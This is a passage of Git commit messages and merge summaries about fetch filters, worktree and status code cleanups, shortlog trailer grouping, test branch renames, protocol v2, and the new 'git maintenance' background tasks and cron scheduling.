if the user invokes "git fetch --filter=<filter>" manually. Therefore,
restore the behavior prior to 5e46139376, which writes a filter-spec
only if the current fetch request is the first partial-fetch one (for
that remote).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The text tries to say the code accepts many variations that look remotely
like scissors and perforation marks, but gives too little detail for users
to decide what is and what is not taken as a scissors line for themselves.
Instead of describing the heuristics more, just spell out what will always
be accepted, namely "-- >8 --", as it would not help users to give them
more choices and flexibility and be "creative" in their scissors line.
Signed-off-by: Evan Gates <evan.gates@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On Windows, we use the `vcpkg` project to manage the dependencies, via
`compat/vcbuild/`. Let's make sure that these dependencies are found by
default.
This is needed because we are about to recommend loading the Git
worktree as a folder into Visual Studio, relying on the automatic CMake
support (which would make it relatively cumbersome to adjust the search
path used by CMake manually).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, Git for Windows does not install its `sh.exe` into the
`PATH`. However, our current `CMakeLists.txt` expects to find a shell
interpreter in the `PATH`.
So let's fall back to looking in the default location where Git for
Windows _does_ install a relatively convenient `sh.exe`:
`C:\Program Files\Git\bin\sh.exe`
Helped-by: Øystein Walle <oystwa@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
That should be a ":", not a second "=". While at it, refer to the
placeholder "<n>" as "<n>", not "n" (see, e.g., the entry just before
this one).
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We document how `merge.suppressDest` can be used to omit " into <branch
name>" from the title of the merge message. It is true that we omit the
space character before "into", but that lone double quote character
risks ending up on the wrong side of a line break, looking a bit out of
place. This currently happens with, e.g., 80-character terminals.
Drop that leading quoted space. The result should be just as clear about
how this option affects the formatted message.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of checking for "refs/heads/" using `starts_with()`, then
skipping past "refs/heads/" using `strlen()`, just use `skip_prefix()`.
In `is_worktree_being_rebased()`, we can adjust the indentation while
we're here and lose a pair of parentheses which isn't needed and which
might even make the reader wonder what they're missing and why that
grouping is there.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As the commit message of 04a3dfb8b5 ("worktree.c: check whether branch
is bisected in another worktree", 2016-04-22) indicates, the function
`is_worktree_being_bisected()` is based on the older function
`is_worktree_being_rebased()`. This heritage can also be seen in the
name of the variable where we store our return value: It was never
adapted while copy-editing and remains as `found_rebase`.
Rename the variable to make clear that we're looking for a bisect(ion),
nothing else.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The comment above `add_head_info()` mentions "head_sha1", but it was
renamed to "head_oid" in 0f05154c70 ("worktree: convert struct worktree
to object_id", 2017-10-15). Update the comment.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have `strbuf_worktree_ref()`, which works on a strbuf, and a wrapper
for it, `worktree_ref()` which returns a string. We even make this
wrapper available through worktree.h. But it only has a single caller,
sitting right next to it in worktree.c.
Just inline the wrapper into its only caller. This means the caller can
quite naturally reuse a single strbuf. We currently achieve something
similar by having a static strbuf in the wrapper.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we have a `struct wt_status_state`, we manually free its `branch`,
`onto` and `detached_from`, or sometimes just one or two of them.
Provide a function `wt_status_state_free_buffers()` which does the
freeing.
The callers are still aware of these fields, e.g., they check whether
`branch` was populated or not. But this way, they don't need to know
about *all* of them, and if `struct wt_status_state` gets more fields,
they will not need to learn to free them.
Users of `struct wt_status` (which contains a `wt_status_state`) already
have `wt_status_collect_free_buffers()` (corresponding to
`wt_status_collect()`) which we can also teach to use this new helper.
Finally, note that we're currently leaving dangling pointers behind.
Some callers work on a stack-allocated struct, where this is obviously
ok. But for the users of `run_status()` in builtin/commit.c, there are
ample opportunities for someone to mistakenly use those dangling
pointers. We seem to be ok for now, but it's a use-after-free waiting to
happen. Let's leave NULL-pointers behind instead.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We pass around a `FILE *` in the `struct wt_status` and almost always
print to it. But in a few places, we write to `stdout` instead, either
explicitly through `fprintf(stdout, ...)` or implicitly with
`printf(...)` (and a few `putchar(...)`).
Always be explicit about writing to `s->fp`. To the best of my
understanding, this never mattered in practice because these spots are
involved in various forms of `git status` which always end up at
standard output anyway. When we do write to another file, it's because
we're creating a commit message template, and these code paths aren't
involved.
But let's be consistent to help future readers and avoid future bugs.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`abbrev_sha1_in_line()` uses a `struct object_id oid` and should be
fully prepared to handle non-SHA1 object ids. Rename it to
`abbrev_oid_in_line()`.
A few comments in `wt_status_get_detached_from()` mention "sha1". The
variable they refer to was renamed in e86ab2c1cd ("wt-status: convert to
struct object_id", 2017-02-21). Update the comments to reference "oid"
instead.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that shortlog supports reading from trailers, it can be useful to
combine counts from multiple trailers, or between trailers and authors.
This can be done manually by post-processing the output from multiple
runs, but it's non-trivial to make sure that each name/commit pair is
counted only once.
This patch teaches shortlog to accept multiple --group options on the
command line, and pull data from all of them. That makes it possible to
run:
git shortlog -ns --group=author --group=trailer:co-authored-by
to get a shortlog that counts authors and co-authors equally.
The implementation is mostly straightforward. The "group" enum becomes a
bitfield, and the trailer key becomes a list. I didn't bother
implementing the multi-group semantics for reading from stdin. It would
be possible to do, but the existing matching code makes it awkward, and
I doubt anybody cares.
The duplicate suppression we used for trailers now covers authors and
committers as well (though in non-trailer single-group mode we can skip
the hash insertion and lookup, since we only see one value per commit).
There is one subtlety: we now care about the case when no group bit is
set (in which case we default to showing the author). The caller in
builtin/log.c needs to be adapted to ask explicitly for authors, rather
than relying on shortlog_init(). It would be possible with some
gymnastics to make this keep working as-is, but it's not worth it for a
single caller.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Trailers don't necessarily contain name/email identity values, so
shortlog has so far treated them as opaque strings. However, since many
trailers do contain identities, it's useful to treat them as such when
they can be parsed. That lets "-e" work as usual, as well as mailmap.
When they can't be parsed, we'll continue with the old behavior of
treating them as a single string (there's no new test for that here,
since the existing tests cover a trailer like this).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function is actually useful for parsing any identity, whether from
stdin or not. We'll need it for handling trailers.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current documentation is vague about what happens with
--group=trailer:signed-off-by when we see a commit with:
Signed-off-by: One
Signed-off-by: Two
Signed-off-by: One
We clearly should credit both "One" and "Two", but should "One" get
credited twice? The current code does so, but mostly because that was
the easiest thing to do. It's probably more useful to count each commit
at most once. This will become especially important when we allow
values from multiple sources in a future patch.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If a project uses commit trailers, this patch lets you use
shortlog to see who is performing each action. For example,
running:
git shortlog -ns --group=trailer:reviewed-by
in git.git shows who has reviewed. You can even use a custom
format to see things like who has helped whom:
git shortlog --format="...helped %an (%ad)" \
--group=trailer:helped-by
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The trailer code knows how to parse out the trailers and re-format them,
but there's no easy way to iterate over the trailers (you can use
trailer_info, but you have to then do a bunch of extra parsing).
Let's add an iteration interface that makes this easy to do.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for adding more grouping types, let's refactor the
committer/author grouping code and add a user-facing option that binds
them together. In particular:
- the main option is now "--group", to make it clear
that the various group types are mutually exclusive. The
"--committer" option is an alias for "--group=committer".
- we keep an enum rather than a binary flag, to prepare
for more values
- we prefer switch statements to ternary assignment, since
other group types will need more custom code
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The completion tests used that name unnecessarily, and it is a
non-inclusive term, so let's avoid using it here.
Since three of the touched test cases make use of the fact that two of
the branch names (`master` and `maint`) start with the same letter (or
even with the same two letters), we choose to replace the use of
`master` by a name that also has that property: `main`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The term `master` has a loaded history that serves as a constant
reminder of racial injustice. The Git project has no desire to
perpetuate this and already started avoiding it.
The test suite uses variations of this name for branches other than the
default one. Apart from t3200, where we just addressed this in the
previous commit, those instances can be renamed in an automated manner
because they do not require any changes outside of the test script, so
let's do that.
Seeing as the touched branches have very little (if anything) to do with
the default branch, we choose to use a completely separate naming
scheme: `topic_<number>` (it cannot be `topic-<number>` because t5515
uses the `test_oid` machinery with the term, and that machinery uses
shell variables internally, whose names cannot contain dashes).
This trick was performed by this (GNU) sed invocation:
$ sed -i 's/master\([a-z0-9]\)/topic_\1/g' t/t*.sh
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
21bf933928 (ref-filter: allow merged and no-merged filters, 2020-09-15)
added an early return to reach_filter(). Avoid leaking the memory of a
then unused array by postponing its allocation until we know we need it.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently only the long version (--source=) supports completion.
Add completion support to the short (-s) option too.
Signed-off-by: Ákos Uzonyi <uzonyi.akos@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In both _git_checkout and _git_switch a new "prevword" variable were
introduced, however the "prev" variable already contains the last word.
The "prevword" variable is replaced with "prev", and the case is moved
to the beginning of the function, like it's done in many other places
(e.g. _git_commit). Also the indentaion of the case is fixed.
Signed-off-by: Ákos Uzonyi <uzonyi.akos@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"diff-highlight" (in contrib/) had a logic to flush its output upon
seeing a blank line but the way it detected a blank line was broken.
* jk/diff-highlight-blank-match-fix:
diff-highlight: correctly match blank lines for flush
"git push" that wants to be atomic and wants to send push
certificate learned not to prepare and sign the push certificate
when it fails the local check (hence due to atomicity it is known
that no certificate is needed).
* hx/push-atomic-with-cert:
send-pack: run GPG after atomic push checking
The "unshelve" subcommand of "git p4" used incorrectly used
commit^N where it meant to say commit~N to name the Nth generation
ancestor, which has been corrected.
* ld/p4-unshelve-fix:
git-p4: use HEAD~$n to find parent commit for unshelve
git-p4 unshelve: adding a commit breaks git-p4 unshelve
"git receive-pack" that accepts requests by "git push" learned to
outsource most of the ref updates to the new "proc-receive" hook.
* jx/proc-receive-hook:
doc: add documentation for the proc-receive hook
transport: parse report options for tracking refs
t5411: test updates of remote-tracking branches
receive-pack: new config receive.procReceiveRefs
doc: add document for capability report-status-v2
New capability "report-status-v2" for git-push
receive-pack: feed report options to post-receive
receive-pack: add new proc-receive hook
t5411: add basic test cases for proc-receive hook
transport: not report a non-head push as a branch
A "git gc"'s big brother has been introduced to take care of more
repository maintenance tasks, not limited to the object database
cleaning.
* ds/maintenance-part-1:
maintenance: add trace2 regions for task execution
maintenance: add auto condition for commit-graph task
maintenance: use pointers to check --auto
maintenance: create maintenance.<task>.enabled config
maintenance: take a lock on the objects directory
maintenance: add --task option
maintenance: add commit-graph task
maintenance: initialize task array
maintenance: replace run_auto_gc()
maintenance: add --quiet option
maintenance: create basic maintenance runner
The object name written to this file is not exposed to end-users and
the only reader of this file immediately expands it back to a full
object name. Stop abbreviating while writing, and expect a full
object name while reading, which simplifies the code a bit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Because these constructs can be used to parse user input to be
passed to rev-list --objects, e.g.
range=$(git rev-parse v1.0..v2.0) &&
git rev-list --objects $range | git pack-objects --stdin
the endpoints (v1.0 and v2.0 in the example) are shown without
peeling them to underlying commits, even when they are annotated
tags. Make sure it stays that way.
While at it, ensure "rev-parse A...B" also keeps the endpoints A and
B unpeeled, even though the negative side (i.e. the merge-base
between A and B) has to become a commit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Protocol v2 became the default in v2.26.0 via 684ceae32d (fetch: default
to protocol version 2, 2019-12-23). More widespread use turned up a
regression in negotiation. That was fixed in v2.27.0 via 4fa3f00abb
(fetch-pack: in protocol v2, in_vain only after ACK, 2020-04-27), but we
also reverted the default to v0 as a precuation in 11c7f2a30b (Revert
"fetch: default to protocol version 2", 2020-04-22).
In v2.28.0, we re-enabled it for experimental users with 3697caf4b9
(config: let feature.experimental imply protocol.version=2, 2020-05-20)
and haven't heard any complaints. v2.28 has only been out for 2 months,
but I'd generally expect people turning on feature.experimental to also
stay pretty up-to-date. So we're not likely to collect much more data by
waiting. In addition, we have no further reports from people running
v2.26.0, and of course some people have been setting protocol.version
manually for ages.
Let's move forward with v2 as the default again. It's possible there are
still lurking bugs, but we won't know until it gets more widespread use.
And we can find and squash them just like any other bug at this point.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add new subcommands to 'git maintenance' that start or stop background
maintenance using 'cron', when available. This integration is as simple
as I could make it, barring some implementation complications.
The schedule is laid out as follows:
0 1-23 * * * $cmd maintenance run --schedule=hourly
0 0 * * 1-6 $cmd maintenance run --schedule=daily
0 0 * * 0 $cmd maintenance run --schedule=weekly
where $cmd is a properly-qualified 'git for-each-repo' execution:
$cmd=$path/git --exec-path=$path for-each-repo --config=maintenance.repo
where $path points to the location of the Git executable running 'git
maintenance start'. This is critical for systems with multiple versions
of Git. Specifically, macOS has a system version at '/usr/bin/git' while
the version that users can install resides at '/usr/local/bin/git'
(symlinked to '/usr/local/libexec/git-core/git'). This will also use
your locally-built version if you build and run this in your development
environment without installing first.
This conditional schedule avoids having cron launch multiple 'git
for-each-repo' commands in parallel. Such parallel commands would likely
lead to the 'hourly' and 'daily' tasks competing over the object
database lock. This could lead to to some tasks never being run! Since
the --schedule=<frequency> argument will run all tasks with _at least_
the given frequency, the daily runs will also run the hourly tasks.
Similarly, the weekly runs will also run the daily and hourly tasks.
The GIT_TEST_CRONTAB environment variable is not intended for users to
edit, but instead as a way to mock the 'crontab [-l]' command. This
variable is set in test-lib.sh to avoid a future test from accidentally
running anything with the cron integration from modifying the user's
schedule. We use GIT_TEST_CRONTAB='test-tool crontab <file>' in our
tests to check how the schedule is modified in 'git maintenance
(start|stop)' commands.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for launching background maintenance from the 'git
maintenance' builtin, create register/unregister subcommands. These
commands update the new 'maintenance.repos' config option in the global
config so the background maintenance job knows which repositories to
maintain.
These commands allow users to add a repository to the background
maintenance list without disrupting the actual maintenance mechanism.
For example, a user can run 'git maintenance register' when no
background maintenance is running and it will not start the background
maintenance. A later update to start running background maintenance will
then pick up this repository automatically.
The opposite example is that a user can run 'git maintenance unregister'
to remove the current repository from background maintenance without
halting maintenance for other repositories.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be helpful to store a list of repositories in global or system
config and then iterate Git commands on that list. Create a new builtin
that makes this process simple for experts. We will use this builtin to
run scheduled maintenance on all configured repositories in a future
change.
The test is very simple, but does highlight that the "--" argument is
optional.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Maintenance currently triggers when certain data-size thresholds are
met, such as number of pack-files or loose objects. Users may want to
run certain maintenance tasks based on frequency instead. For example,
a user may want to perform a 'prefetch' task every hour, or 'gc' task
every day. To help these users, update the 'git maintenance run' command
to include a '--schedule=<frequency>' option. The allowed frequencies
are 'hourly', 'daily', and 'weekly'. These values are also allowed in a
new config value 'maintenance.<task>.schedule'.
The 'git maintenance run --schedule=<frequency>' checks the '*.schedule'
config value for each enabled task to see if the configured frequency is
at least as frequent as the frequency from the '--schedule' argument. We
use the following order, for full clarity:
'hourly' > 'daily' > 'weekly'
Use new 'enum schedule_priority' to track these values numerically.
The following cron table would run the scheduled tasks with the correct
frequencies:
0 1-23 * * * git -C <repo> maintenance run --schedule=hourly
0 0 * * 1-6 git -C <repo> maintenance run --schedule=daily
0 0 * * 0 git -C <repo> maintenance run --schedule=weekly
This cron schedule will run --schedule=hourly every hour except at
midnight. This avoids a concurrent run with the --schedule=daily that
runs at midnight every day except the first day of the week. This avoids
a concurrent run with the --schedule=weekly that runs at midnight on
the first day of the week. Since --schedule=daily also runs the
'hourly' tasks and --schedule=weekly runs the 'hourly' and 'daily'
tasks, we will still see all tasks run with the proper frequencies.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some commands run 'git maintenance run --auto --[no-]quiet' after doing
their normal work, as a way to keep repositories clean as they are used.
Currently, users who do not want this maintenance to occur would set the
'gc.auto' config option to 0 to avoid the 'gc' task from running.
However, this does not stop the extra process invocation. On Windows,
this extra process invocation can be more expensive than necessary.
Allow users to drop this extra process by setting 'maintenance.auto' to
'false'.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The incremental-repack task updates the multi-pack-index by deleting pack-
files that have been replaced with new packs, then repacking a batch of
small pack-files into a larger pack-file. This incremental repack is faster
than rewriting all object data, but is slower than some other
maintenance activities.
The 'maintenance.incremental-repack.auto' config option specifies how many
pack-files should exist outside of the multi-pack-index before running
the step. These pack-files could be created by 'git fetch' commands or
by the loose-objects task. The default value is 10.
Setting the option to zero disables the task with the '--auto' option,
and a negative value makes the task run every time.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When repacking during the 'incremental-repack' task, we use the
--batch-size option in 'git multi-pack-index repack'. The initial setting
used --batch-size=0 to repack everything into a single pack-file. This is
not sustainable for a large repository. The amount of work required is
also likely to use too many system resources for a background job.
Update the 'incremental-repack' task by dynamically computing a
--batch-size option based on the current pack-file structure.
The dynamic default size is computed with this idea in mind for a client
repository that was cloned from a very large remote: there is likely one
"big" pack-file that was created at clone time. Thus, do not try
repacking it as it is likely packed efficiently by the server.
Instead, we select the second-largest pack-file, and create a batch size
that is one larger than that pack-file. If there are three or more
pack-files, then this guarantees that at least two will be combined into
a new pack-file.
Of course, this means that the second-largest pack-file size is likely
to grow over time and may eventually surpass the initially-cloned
pack-file. Recall that the pack-file batch is selected in a greedy
manner: the packs are considered from oldest to newest and are selected
if they have size smaller than the batch size until the total selected
size is larger than the batch size. Thus, that oldest "clone" pack will
be first to repack after the new data creates a pack larger than that.
We also want to place some limits on how large these pack-files become,
in order to bound the amount of time spent repacking. A maximum
batch-size of two gigabytes means that large repositories will never be
packed into a single pack-file using this job, but also that repack is
rather expensive. This is a trade-off that is valuable to have if the
maintenance is being run automatically or in the background. Users who
truly want to optimize for space and performance (and are willing to pay
the upfront cost of a full repack) can use the 'gc' task to do so.
Create a test for this two gigabyte limit by creating an EXPENSIVE test
that generates two pack-files of roughly 2.5 gigabytes in size, then
performs an incremental repack. Check that the --batch-size argument in
the subcommand uses the hard-coded maximum.
Helped-by: Chris Torek <chris.torek@gmail.com>
Reported-by: Son Luong Ngoc <sluongng@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous change cleaned up loose objects using the
'loose-objects' that can be run safely in the background. Add a
similar job that performs similar cleanups for pack-files.
One issue with running 'git repack' is that it is designed to
repack all pack-files into a single pack-file. While this is the
most space-efficient way to store object data, it is not time or
memory efficient. This becomes extremely important if the repo is
so large that a user struggles to store two copies of the pack on
their disk.
Instead, perform an "incremental" repack by collecting a few small
pack-files into a new pack-file. The multi-pack-index facilitates
this process ever since 'git multi-pack-index expire' was added in
19575c7 (multi-pack-index: implement 'expire' subcommand,
2019-06-10) and 'git multi-pack-index repack' was added in ce1e4a1
(midx: implement midx_repack(), 2019-06-10).
The 'incremental-repack' task runs the following steps:
1. 'git multi-pack-index write' creates a multi-pack-index file if
one did not exist, and otherwise will update the multi-pack-index
with any new pack-files that appeared since the last write. This
is particularly relevant with the background fetch job.
When the multi-pack-index sees two copies of the same object, it
stores the offset data into the newer pack-file. This means that
some old pack-files could become "unreferenced" which I will use
to mean "a pack-file that is in the pack-file list of the
multi-pack-index but none of the objects in the multi-pack-index
reference a location inside that pack-file."
2. 'git multi-pack-index expire' deletes any unreferenced pack-files
and updaes the multi-pack-index to drop those pack-files from the
list. This is safe to do as concurrent Git processes will see the
multi-pack-index and not open those packs when looking for object
contents. (Similar to the 'loose-objects' job, there are some Git
commands that open pack-files regardless of the multi-pack-index,
but they are rarely used. Further, a user that self-selects to
use background operations would likely refrain from using those
commands.)
3. 'git multi-pack-index repack --bacth-size=<size>' collects a set
of pack-files that are listed in the multi-pack-index and creates
a new pack-file containing the objects whose offsets are listed
by the multi-pack-index to be in those objects. The set of pack-
files is selected greedily by sorting the pack-files by modified
time and adding a pack-file to the set if its "expected size" is
smaller than the batch size until the total expected size of the
selected pack-files is at least the batch size. The "expected
size" is calculated by taking the size of the pack-file divided
by the number of objects in the pack-file and multiplied by the
number of objects from the multi-pack-index with offset in that
pack-file. The expected size approximates how much data from that
pack-file will contribute to the resulting pack-file size. The
intention is that the resulting pack-file will be close in size
to the provided batch size.
The next run of the incremental-repack task will delete these
repacked pack-files during the 'expire' step.
In this version, the batch size is set to "0" which ignores the
size restrictions when selecting the pack-files. It instead
selects all pack-files and repacks all packed objects into a
single pack-file. This will be updated in the next change, but
it requires doing some calculations that are better isolated to
a separate change.
These steps are based on a similar background maintenance step in
Scalar (and VFS for Git) [1]. This was incredibly effective for
users of the Windows OS repository. After using the same VFS for Git
repository for over a year, some users had _thousands_ of pack-files
that combined to up to 250 GB of data. We noticed a few users were
running into the open file descriptor limits (due in part to a bug
in the multi-pack-index fixed by af96fe3 (midx: add packs to
packed_git linked list, 2019-04-29).
These pack-files were mostly small since they contained the commits
and trees that were pushed to the origin in a given hour. The GVFS
protocol includes a "prefetch" step that asks for pre-computed pack-
files containing commits and trees by timestamp. These pack-files
were grouped into "daily" pack-files once a day for up to 30 days.
If a user did not request prefetch packs for over 30 days, then they
would get the entire history of commits and trees in a new, large
pack-file. This led to a large number of pack-files that had poor
delta compression.
By running this pack-file maintenance step once per day, these repos
with thousands of packs spanning 200+ GB dropped to dozens of pack-
files spanning 30-50 GB. This was done all without removing objects
from the system and using a constant batch size of two gigabytes.
Once the work was done to reduce the pack-files to small sizes, the
batch size of two gigabytes means that not every run triggers a
repack operation, so the following run will not expire a pack-file.
This has kept these repos in a "clean" state.
[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/PackfileMaintenanceStep.cs
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that the multi-pack-index may be written as part of auto maintenance
at the end of a command, reduce the progress output when the operations
are quick. Use start_delayed_progress() instead of start_progress().
Update t5319-multi-pack-index.sh to use GIT_PROGRESS_DELAY=0 now that
the progress indicators are conditional.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The core.multiPackIndex setting has been around since c4d25228eb
(config: create core.multiPackIndex setting, 2018-07-12), but has been
disabled by default. If a user wishes to use the multi-pack-index
feature, then they must enable this config and run 'git multi-pack-index
write'.
The multi-pack-index feature is relatively stable now, so make the
config option true by default. For users that do not use a
multi-pack-index, the only extra cost will be a file lookup to see if a
multi-pack-index file exists (once per process, per object directory).
Also, this config option will be referenced by an upcoming
"incremental-repack" task in the maintenance builtin, so move the config
option into the repository settings struct. Note that if
GIT_TEST_MULTI_PACK_INDEX=1, then we want to ignore the config option
and treat core.multiPackIndex as enabled.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The loose-objects task deletes loose objects that already exist in a
pack-file, then place the remaining loose objects into a new pack-file.
If this step runs all the time, then we risk creating pack-files with
very few objects with every 'git commit' process. To prevent
overwhelming the packs directory with small pack-files, place a minimum
number of objects to justify the task.
The 'maintenance.loose-objects.auto' config option specifies a minimum
number of loose objects to justify the task to run under the '--auto'
option. This defaults to 100 loose objects. Setting the value to zero
will prevent the step from running under '--auto' while a negative value
will force it to run every time.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One goal of background maintenance jobs is to allow a user to
disable auto-gc (gc.auto=0) but keep their repository in a clean
state. Without any cleanup, loose objects will clutter the object
database and slow operations. In addition, the loose objects will
take up extra space because they are not stored with deltas against
similar objects.
Create a 'loose-objects' task for the 'git maintenance run' command.
This helps clean up loose objects without disrupting concurrent Git
commands using the following sequence of events:
1. Run 'git prune-packed' to delete any loose objects that exist
in a pack-file. Concurrent commands will prefer the packed
version of the object to the loose version. (Of course, there
are exceptions for commands that specifically care about the
location of an object. These are rare for a user to run on
purpose, and we hope a user that has selected background
maintenance will not be trying to do foreground maintenance.)
2. Run 'git pack-objects' on a batch of loose objects. These
objects are grouped by scanning the loose object directories in
lexicographic order until listing all loose objects -or-
reaching 50,000 objects. This is more than enough if the loose
objects are created only by a user doing normal development.
We noticed users with _millions_ of loose objects because VFS
for Git downloads blobs on-demand when a file read operation
requires populating a virtual file.
This step is based on a similar step in Scalar [1] and VFS for Git.
[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/LooseObjectsStep.cs
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When working with very large repositories, an incremental 'git fetch'
command can download a large amount of data. If there are many other
users pushing to a common repo, then this data can rival the initial
pack-file size of a 'git clone' of a medium-size repo.
Users may want to keep the data on their local repos as close as
possible to the data on the remote repos by fetching periodically in
the background. This can break up a large daily fetch into several
smaller hourly fetches.
The task is called "prefetch" because it is work done in advance
of a foreground fetch to make that 'git fetch' command much faster.
However, if we simply ran 'git fetch <remote>' in the background,
then the user running a foreground 'git fetch <remote>' would lose
some important feedback when a new branch appears or an existing
branch updates. This is especially true if a remote branch is
force-updated and this isn't noticed by the user because it occurred
in the background. Further, the functionality of 'git push
--force-with-lease' becomes suspect.
When running 'git fetch <remote> <options>' in the background, use
the following options for careful updating:
1. --no-tags prevents getting a new tag when a user wants to see
the new tags appear in their foreground fetches.
2. --refmap= removes the configured refspec which usually updates
refs/remotes/<remote>/* with the refs advertised by the remote.
While this looks confusing, this was documented and tested by
b40a50264a (fetch: document and test --refmap="", 2020-01-21),
including this sentence in the documentation:
Providing an empty `<refspec>` to the `--refmap` option
causes Git to ignore the configured refspecs and rely
entirely on the refspecs supplied as command-line arguments.
3. By adding a new refspec "+refs/heads/*:refs/prefetch/<remote>/*"
we can ensure that we actually load the new values somewhere in
our refspace while not updating refs/heads or refs/remotes. By
storing these refs here, the commit-graph job will update the
commit-graph with the commits from these hidden refs.
4. --prune will delete the refs/prefetch/<remote> refs that no
longer appear on the remote.
5. --no-write-fetch-head prevents updating FETCH_HEAD.
We've been using this step as a critical background job in Scalar
[1] (and VFS for Git). This solved a pain point that was showing up
in user reports: fetching was a pain! Users do not like waiting to
download the data that was created while they were away from their
machines. After implementing background fetch, the foreground fetch
commands sped up significantly because they mostly just update refs
and download a small amount of new data. The effect is especially
dramatic when paried with --no-show-forced-udpates (through
fetch.showForcedUpdates=false).
[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/FetchStep.cs
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We already match "committer", and we're about to start
matching more things. Let's use a more neutral variable to
avoid confusion.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 06f5608c14 (bisect--helper: `bisect_start` shell function
partially in C, 2019-01-02), we changed the following shell
code:
- rev=$(git rev-parse -q --verify "$arg^{commit}") || {
- test $has_double_dash -eq 1 &&
- die "$(eval_gettext "'\$arg' does not appear to be a valid revision")"
- break
- }
- revs="$revs $rev"
into:
+ char *commit_id = xstrfmt("%s^{commit}", arg);
+ if (get_oid(commit_id, &oid) && has_double_dash)
+ die(_("'%s' does not appear to be a valid "
+ "revision"), arg);
+
+ string_list_append(&revs, oid_to_hex(&oid));
+ free(commit_id);
In case of an invalid "arg" when "has_double_dash" is false, the old
code would "break" out of the argument loop.
In the new C code though, `oid_to_hex(&oid)` is unconditonally
appended to "revs". This is wrong first because "oid" is junk as
`get_oid(commit_id, &oid)` failed and second because it doesn't break
out of the argument loop.
Not breaking out of the argument loop means that "arg" is then not
treated as a path restriction (which is wrong).
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A user who understands enough to set pull.ff does not need additional
instructions.
Signed-off-by: Alex Henrie <alexhenrie24@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The command reads list of object names to place on the ignore list
either from the command line or from a file, but they are not
checked with their object type (those read from the file are not
even checked for object existence).
